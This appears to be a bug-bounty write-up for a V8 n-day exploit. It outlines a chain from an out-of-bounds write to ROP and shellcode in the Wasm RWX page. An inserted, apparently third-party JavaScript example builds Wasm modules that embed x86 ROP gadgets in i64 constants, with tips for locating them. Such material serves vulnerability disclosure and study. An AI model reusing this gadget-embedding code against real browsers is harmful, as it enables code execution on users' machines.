v8CTF submission 45ff096edfe1

Reported by: madStacks

Google VRP

  • accepted

  • fixed

reward decided

$10,000

Vulnerability

This is an n-day exploit based on Chromium issue 1472121, whose bug report is still restricted from public view. I found it by looking through the V8 commit history (https://github.com/v8/v8/commit/10b0e62e7059a29e4c23b3e041c5da87983f22bc). The commit also has a regression test that I was able to use to trigger the vulnerability and achieve an OOB write.

Exploit

The steps for the exploit are:

  1. Use the vulnerability to corrupt V8 heap objects and build read, write, and addr_of primitives inside the V8 sandbox
  2. Load a WebAssembly module whose compiled code contains ROP gadgets (the immediate operands of mov instructions are constants chosen so that their bytes decode as useful instructions), and leak the gadget addresses from the WasmInstance object
  3. Create a byte array holding the final x86 payload to run
  4. Create and modify V8 bytecode to take control of rsp/rbp
  5. Use the controlled stack to ROP: copy the byte array into the Wasm RWX page and jump to it

The only address I needed to leak was that of the Wasm RWX page, which is referenced by a full 64-bit pointer stored inside the sandbox.
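The following is an added example illustrating step 2, the "constants that are encoded instructions" trick: it is not the submission's code (test.wat/test.wasm are not reproduced here) and its gadget selection is my own. It packs short x86-64 gadgets into the little-endian imm64 of a `mov r64, imm64`, emits a minimal hand-assembled Wasm module whose exported functions each return one such i64 constant, and instantiates it to confirm the module is valid and the constants survive intact. It assumes, as the write-up reports, that V8's Wasm compiler materialises an i64.const with a movabs-style instruction so the immediate bytes land in executable memory; where in the JIT code they land, and the address leak from WasmInstance, are outside this example.

```javascript
// Unsigned LEB128, used for section and vector sizes.
function uleb(n) {
  const out = [];
  do {
    let b = n & 0x7f;
    n >>>= 7;
    if (n !== 0) b |= 0x80;
    out.push(b);
  } while (n !== 0);
  return out;
}

// Signed LEB128 for a BigInt in [-2^63, 2^63), the encoding of an i64.const immediate.
function sleb64(v) {
  const out = [];
  for (;;) {
    const b = Number(v & 0x7fn);
    v >>= 7n; // arithmetic shift on BigInt keeps the sign
    const done = (v === 0n && (b & 0x40) === 0) || (v === -1n && (b & 0x40) !== 0);
    out.push(done ? b : b | 0x80);
    if (done) return out;
  }
}

// Pack 1..8 bytes of machine code into the little-endian imm64 of a `mov r64, imm64`:
// byte 0 of the gadget becomes the lowest byte of the constant. Bytes after the
// gadget's `ret` are never executed; they are padded with nops (0x90).
function packGadget(bytes) {
  if (bytes.length === 0 || bytes.length > 8) throw new RangeError('gadget must be 1..8 bytes');
  if (bytes[bytes.length - 1] !== 0xc3) throw new Error('gadget must end in ret (0xc3)');
  let v = 0n;
  for (let i = 0; i < 8; i++) {
    const b = i < bytes.length ? bytes[i] : 0x90;
    v |= BigInt(b) << BigInt(8 * i);
  }
  return v; // unsigned, 0 <= v < 2^64
}

// Inverse of packGadget, for checking what bytes a constant will lay down.
function unpackGadget(v) {
  const out = [];
  for (let i = 0; i < 8; i++) out.push(Number((v >> BigInt(8 * i)) & 0xffn));
  return out;
}

// Hand-assemble a Wasm module exporting one function gN per constant; each
// function body is just `i64.const <constant>; end`.
function buildGadgetModule(consts) {
  const section = (id, body) => [id, ...uleb(body.length), ...body];
  const n = consts.length;
  const typeSec = section(1, [1, 0x60, 0, 1, 0x7e]);                   // one type: () -> i64
  const funcSec = section(3, [...uleb(n), ...new Array(n).fill(0)]);   // n functions of type 0
  const exps = [];
  consts.forEach((_, i) => {
    const name = [...new TextEncoder().encode(`g${i}`)];
    exps.push(...uleb(name.length), ...name, 0x00, ...uleb(i));        // export kind 0 = func
  });
  const exportSec = section(7, [...uleb(n), ...exps]);
  const bodies = [];
  for (const c of consts) {
    const body = [0x00, 0x42, ...sleb64(BigInt.asIntN(64, c)), 0x0b]; // no locals; i64.const; end
    bodies.push(...uleb(body.length), ...body);
  }
  const codeSec = section(10, [...uleb(n), ...bodies]);
  return new Uint8Array([0x00, 0x61, 0x73, 0x6d, 1, 0, 0, 0, ...typeSec, ...funcSec, ...exportSec, ...codeSec]);
}

// Instantiate the module and read every constant back through its export, as the
// unsigned 64-bit value that packGadget produced.
function instantiateGadgets(gadgets) {
  const consts = gadgets.map(packGadget);
  const inst = new WebAssembly.Instance(new WebAssembly.Module(buildGadgetModule(consts)));
  return consts.map((_, i) => BigInt.asUintN(64, inst.exports[`g${i}`]()));
}

// Example gadget set (my choice, not the submission's): enough to set up
// registers and write a qword, e.g. for a memcpy-style loop in the ROP chain.
const GADGETS = {
  popRdiRet: [0x5f, 0xc3],              // pop rdi; ret
  popRsiRet: [0x5e, 0xc3],              // pop rsi; ret
  popRdxRet: [0x5a, 0xc3],              // pop rdx; ret
  popRaxRet: [0x58, 0xc3],              // pop rax; ret
  movRdiRaxRet: [0x48, 0x89, 0x07, 0xc3], // mov [rdi], rax; ret
  jmpRdi: [0xff, 0xe7, 0xc3],           // jmp rdi (the trailing ret is never reached)
};

if (typeof require !== 'undefined' && require.main === module) {
  const values = instantiateGadgets(Object.values(GADGETS));
  for (const [i, name] of Object.keys(GADGETS).entries()) {
    console.log(name, '0x' + values[i].toString(16), unpackGadget(values[i]).map((b) => b.toString(16)));
  }
}
```

With a V8 shell the effect can be checked directly: run the module under d8 with `--print-wasm-code` and look for the `movabs`/`movq` instructions carrying these immediates; the gadget address is the address of that instruction plus the length of its opcode bytes. Note that a constant which the compiler can fold or rematerialise differently (for instance if it is only used in a comparison) may not be emitted as a single immediate, so keep the constant's use simple, as returning it does here.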

Attached files

The entire exploit is written in 1472121_min.js and is called from 1472121.html along with some useful helper functions. Other files are included to help with testing:

  • test.wat: the WebAssembly code to generate ROP gadgets
  • test.wasm: compiled WebAssembly used in exploit
  • server.py: a small script for serving the files over HTTPS

Download exploit.tag.gz containing the above-mentioned files.